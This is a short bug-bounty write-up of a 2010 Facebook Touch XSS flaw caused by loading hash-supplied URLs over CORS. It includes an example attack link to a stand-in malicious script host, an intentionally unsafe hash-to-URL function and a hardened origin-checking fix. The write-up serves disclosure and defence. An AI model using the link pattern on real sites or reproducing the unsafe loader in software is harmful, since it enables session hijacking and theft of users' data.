Facebook XSS via Cross-Origin Resource Sharing

Program: Facebook
Bug Type: XSS
Bounty: Unspecified
Date: 2010-06-06
Tags: business-logic, api, cors, xss, client-side, html5, validation

Summary

A security researcher discovered a serious business logic flaw in Facebook Touch's use of HTML5 and Cross-Origin Resource Sharing (CORS) in 2010. The mobile interface dynamically loaded URLs via AJAX based on the window hash, and failed to restrict these URLs to Facebook-owned domains. As a result, attackers could inject external URLs that were loaded and executed client-side due to CORS, enabling cross-site scripting (XSS). This allowed attackers to run arbitrary JavaScript in a user's session, potentially exposing private data, sending messages, or escalating privileges. The vulnerability was client-side and left no server traces. Once reported, Facebook fixed the issue within a day by implementing client-side URL origin validation.

Key points:

  • The bug exploited HTML5 CORS combined with unsafe dynamic AJAX content loading.
  • Attackers could craft links like http://touch.facebook.com/#http://malicious.com/exploit.js.
  • Malicious scripts could control the user's session and interact with Facebook on the user's behalf.
  • The underlying issue was not validating URL origins in JavaScript, an example of weak business logic in new web technology adoption.
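The origin check that closes this class of bug, as an added example (not Facebook's own code): the fragment after `#` is resolved against the page URL, and the request is only made when the result is an http(s) URL on an allow list. The names `ALLOWED_ORIGINS`, `unsafeTargetFromHash` and `resolveHashTarget` are hypothetical.

```javascript
// Added example, not code from the original write-up or from Facebook.
// Origins the mobile site may load page fragments from (constructed list).
const ALLOWED_ORIGINS = new Set([
  "https://touch.facebook.com",
  "http://touch.facebook.com",
]);

// The vulnerable pattern described above: whatever follows "#" is used
// verbatim as the AJAX request URL, so an external script URL is accepted.
function unsafeTargetFromHash(hash) {
  return hash.slice(1);
}

// Hardened version. Returns the absolute URL to request, or null when the
// fragment must not be fetched.
function resolveHashTarget(hash, pageUrl) {
  const raw = hash.startsWith("#") ? hash.slice(1) : hash;
  if (raw === "") return null;
  let target;
  try {
    // Relative paths ("#/profile") resolve against the page; absolute,
    // protocol-relative ("//other.example/x") and userinfo-prefixed
    // ("http://touch.facebook.com@other.example/") URLs keep their real
    // origin, which the allow-list check below rejects.
    target = new URL(raw, pageUrl);
  } catch (e) {
    return null; // unparsable fragment
  }
  // javascript:, data: and similar schemes have origin "null"; reject them
  // before the origin comparison rather than relying on it.
  if (target.protocol !== "https:" && target.protocol !== "http:") return null;
  if (!ALLOWED_ORIGINS.has(target.origin)) return null;
  return target.href;
}
```

Only the string returned by `resolveHashTarget` should be passed to the XMLHttpRequest; a null result is the signal to fall back to a default page rather than to retry with the raw fragment.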

This summary was partly generated by AI
